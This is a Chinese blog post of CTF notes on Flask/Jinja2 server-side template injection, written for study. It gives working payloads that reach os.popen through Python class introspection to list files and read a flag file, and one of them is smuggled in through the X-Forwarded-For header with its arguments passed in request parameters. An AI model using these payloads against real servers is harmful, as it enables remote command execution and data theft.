CTF题目记录8SSTI

最新推荐文章于 2024-04-14 22:20:04 发布
最新推荐文章于 2024-04-14 22:20:04 发布
阅读量1.4k 收藏 6
点赞数 1
分类专栏: CTF题目记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39679772/article/details/106543454
版权

7、16更:今天终于明白了一些,让我隔日再写写,加入一点自己的东西吧

github上的超全SSTI

Web_python_template_injection

flask模版注入不会啊,只能面向搜索引擎,已经入土了
首先是推荐两篇好文:

1.从零学习flask模板注入
(其实是从入门到入土,小白强推这篇
2.Flask/Jinja2 SSTI && python 沙箱逃逸
3.服务端模板注入攻击 (SSTI)之浅析
4.利用SSTI漏洞获取服务器Shell
5.Python——flask漏洞探究

不管现在还懂不懂原理,有payload模版就模仿着肝吧!

1.测试是否有注入点
{{1+1}} 之类的,成功执行则说明有模版注入

接下来是多个wp…

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}

过程:
总的来说

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("要执行的语句").read()}}

参考:1
2py沙箱逃逸

3 wp2

miniL Personal_IP_Query

放dlwp防忘 毕竟是想了好久的题目
在这里插入图片描述

http://e0579dc296f4fa31220536d95e3b68b5.challenge.mini.lctf.online:1080/?class=__class__&mro=__mro__&subclasses=__subclasses__&init=__init__&globals=__globals__&popen=popen&cmd=cat /flag

X-Forwarded-For: {{ ()[request.args.class][request.args.mro][-1][request.args.subclasses]()[127][request.args.init][request.args.globals][request.args.popen](request.args.cmd).read() }}
kkzz1x
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 2585
ssti注入
CTF-web-ssti模板注入漏洞
最新发布
Ye的博客
04-14 818
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5600
“百度杯”CTF比赛 十一月场 Web题:Fuzz python SSTI模板注入
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4225
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
qq_39947980的博客
03-13 1540
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
常规的CTF题目解析.pdf
08-07
从入门到高级的题目讲解,teacher g都有独到的见解。答题人与出题人的较量···文章和线上和线下的讲解。先是工具的准备,规划,如团队工作,和体力的补充。入门级的题目相信大家在线上都做过不少,都是考基本功...
CTF_Web:从0学习Flask模板注入(SSTI)
AFCC_的博客(Web_Dog)
08-30 3319
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
CTF】 SSTI模板注入漏洞
ZhangAweio的博客
05-29 706
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 290
SSTI
83 CTF夺旗-Python考点SSTI&反序列化&字符串
山兔的博客
02-07 1133
MISC(安全杂项):全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广。我们平时看到的社工类题目;给你一个流量包让你分析的题目;取证分析题目;都属于这类题目。主要考查参赛选手的各种基础综合知识,考察范围比较广。PPC(编程类):全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写,批量处理等,有时候用编程去处理问题,会方便的多。当然PPC相比ACM来说,还是较为容易的。
CTF题型 SSTI(3) Smart SSTI 例题和题记
qq_39947980的博客
03-14 468
前面我们学习了Flask SSTISmart SSTI和Flask SSTI 不同Smart SSTI 是基于php的,居然可以在其中参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693标签{eval}执行任意php代码。
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 560
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
CTF-SSTI-Flask-Jinja2
m0_74317362的博客
09-29 130
二是warnings.catch_warnings(需自己导入os模块)、socket._socketobject(需自己导入os模块)、site._Printer、site.Quitter等模块的内置os,通过os模块我们可以做到system执行命令(system执行成功返回0,不会在页面显示。在子类中并不是所有的都能用上,需要找的 一是file模块中的read功能,用来读取各种文件,敏感信息等。在flask里面可以有两种船只的方式,一种是需要参数的,另一种则不需要,这道题是第二种。
SSTI原理以及ctf.show的SSTI(web361-web362)
wanan的博客
09-30 678
SSTI原理以及ctf.show的SSTI(web361-web362)
buu ctf web进阶]ssti
08-23
在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值